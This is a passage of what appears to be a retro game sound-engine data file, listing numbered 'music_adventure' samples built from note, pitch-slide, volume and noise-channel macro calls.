PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(3,29) SAMPLE_END .) music_adventure_sample_40: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_41: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(2,29) AUDIO_PULSE_META_NOTE_USLIDE(43,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(2,29) SAMPLE_END .) music_adventure_sample_42: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_43: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) HALT(7) WAIT(1) SAMPLE_END .) music_adventure_sample_44: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) SAMPLE_END .) music_adventure_sample_45: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) PLAY_TIMED_NOTE(9,41) PLAY_TIMED_NOTE(9,39) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_NOTE(8,39) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) HALT(7) WAIT(2) SAMPLE_END .) music_adventure_sample_46: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(2,24) PLAY_TIMED_NOTE(9,43) PLAY_TIMED_NOTE(9,41) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(2,24) PLAY_TIMED_NOTE(9,41) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(2,24) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(1,24) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(0,27) PLAY_TIMED_NOTE(0,25) PLAY_TIMED_NOTE(3,24) SAMPLE_END .) music_adventure_sample_47: .( PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,46) PLAY_TIMED_NOTE(4,43) SAMPLE_END .) music_adventure_sample_48: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_FREQ(297,65) SAMPLE_END .) music_adventure_sample_49: .( HALT(4) SAMPLE_END .) music_adventure_sample_50: .( PLAY_TIMED_FREQ(333,55) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) SAMPLE_END .) music_adventure_sample_51: .( AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_FREQ(374,65) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(0,26) PLAY_TIMED_NOTE(2,25) SAMPLE_END .) music_adventure_sample_52: .( PLAY_TIMED_NOTE(14,39) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) HALT(4) SAMPLE_END .) music_adventure_sample_53: .( PLAY_TIMED_FREQ(333,25) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) HALT(4) SAMPLE_END .) music_adventure_sample_54: .( PLAY_TIMED_NOTE(14,39) AUDIO_PULSE_META_WAIT_DSLIDE(1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) SAMPLE_END .) music_adventure_sample_55: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(12,27) SAMPLE_END .) music_adventure_sample_56: .( PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(0,28) PLAY_TIMED_NOTE(2,27) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_NOTE(9,39) SAMPLE_END .) music_adventure_sample_57: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(2) SAMPLE_END .) music_adventure_sample_58: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_59: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(1) SAMPLE_END .) music_adventure_sample_60: .( AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_61: .( AUDIO_PULSE_META_WAIT_DUT_USLIDE(1,2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) CHAN_VOLUME_HIGH(6) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(1,13,1) CHAN_VOLUME_HIGH(4) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(1,11,0) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_USLIDE(1,9,-1) CHAN_VOLUME_HIGH(0) WAIT(0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,7,0) SAMPLE_END .) music_adventure_sample_62: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,15,0) SAMPLE_END .) music_adventure_sample_63: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,0,15) SAMPLE_END .) music_adventure_sample_64: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,0,15) SAMPLE_END .) music_adventure_sample_65: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(31,1,0,15) SAMPLE_END .) music_adventure_sample_66: .( CHAN_VOLUME_HIGH(7) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,44) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) SAMPLE_END .) music_adventure_sample_67: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,0,15,0) SAMPLE_END .) music_adventure_sample_68: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,0,15) SAMPLE_END .) music_adventure_sample_69: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(37,1,0,15,0) SAMPLE_END .) music_adventure_sample_70: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(36,1,15,7) AUDIO_PULSE_META_NOTE_DUT_VOL(24,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,36) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_NOTE_DSLIDE(36,3,0) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,0,15) SAMPLE_END .) music_adventure_sample_71: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(32,1,0,15,0) SAMPLE_END .) music_adventure_sample_72: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(39,1,0,15,0) SAMPLE_END .) music_adventure_sample_73: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,0,15) SAMPLE_END .) music_adventure_sample_74: .( AUDIO_PULSE_META_NOTE_USLIDE(44,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(43,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) SAMPLE_END .) music_adventure_sample_75: .( AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(18,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_76: .( AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(38,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) SAMPLE_END .) music_adventure_sample_77: .( AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(6) SAMPLE_END .) music_adventure_sample_78: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_79: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_80: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) 